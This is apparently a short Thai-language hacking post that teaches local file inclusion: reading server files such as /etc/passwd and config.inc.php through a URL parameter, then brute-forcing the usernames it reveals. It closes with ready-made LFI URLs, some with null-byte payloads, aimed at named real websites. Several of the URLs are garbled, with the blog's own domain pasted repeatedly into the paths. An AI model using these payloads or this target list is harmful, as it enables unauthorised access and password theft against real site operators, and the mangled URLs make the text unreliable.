ที่ทำให้สามารถเรียกดู file ที่มีอยู่ในเครื่อง server ได้
ลักษณะของบัค จะเป็นประเภท เอา http://windows98se.multiply.com/http://windows98se.multiply.com/ ไปต่อท้าย url
เช่น http://windows98SE.multiply.com/lfi.php?bug=[LFI]
ไอ้เจ้า [LFI] ถ้าเป็น os win เราก็จะเรียก พวก boot.ini มาดู หรือ เรียก พวก config.inc.php
มาดู พาส sql ที่อยู่ใน file
ถ้าเป็น linux ก็จะเรียก พวก config.inc.php หรือ file ที่ใช้เก็บ account ก็คือ /etc/passwd
แต่ก่อน พาสใน linux จะไม่ได้เข้ารหัสวิธีนี้เลยทำให้ hack user-pass มาได้ง่ายมาก
เดี๋ยวนี้ จะ hack มาได้แค่ user เท่านั้น เพราะ พาส โดนเข้ารหัสไว้หมดแล้ว
... อ่าวแล้วจะ hack เอา user มาทำไมล่ะ พาสไม่มีจะตู login ได้ไง
... นั่นดิ hack แค่ user เอามาทำอะไรได้ คำตอบก็คือ บรูท ไง ใช่แระ บรูท !!
บางคนคิดในใจ โห แล้วมันจะ hack ได้มั้ย ถ้าเกิดตั้งพาสซัก 12 หลักใช้ตัวอักษรผสมเลข
บรูทกันจนแก่ก็บรูทไม่ออกแล้ว
ใช่คับ บรูทไม่ออกหรอกถ้าเราบรูท แค่ user เดียว
แต่เราลองมาคิดในทางกลับกัน
... ถ้าเครื่องคอมระดับเครื่อง server มันก็ต้องมี user มากกว่า 1 account
ดังนั้น account ทั้งหลายในเครื่องมันต้องมีซักคนแหละน่า ที่ ตั้งพาสง่าย สามารถบรูทได้
ไม่เชื่อก็ดูจาก ใน link เอาเอง แล้วกัน ว่ามีกี่ account
http://typs.com/home/main.php/main.php?page=/etc/passwd
http://alteclansing.com/index.php?file=http://windows98se.multiply.com/http://windows98se.multiply.com/etc/passwd%00 (view src ดู)
http://2kgames.com/index.php?p=http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/etc/passwd%00
http://atari.com/rollercoastertycoon/us/main.php?page=/etc/passwd%00
http://algo.epfl.ch/index.php?p=http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/etc/passwd%00
จบดีก่า
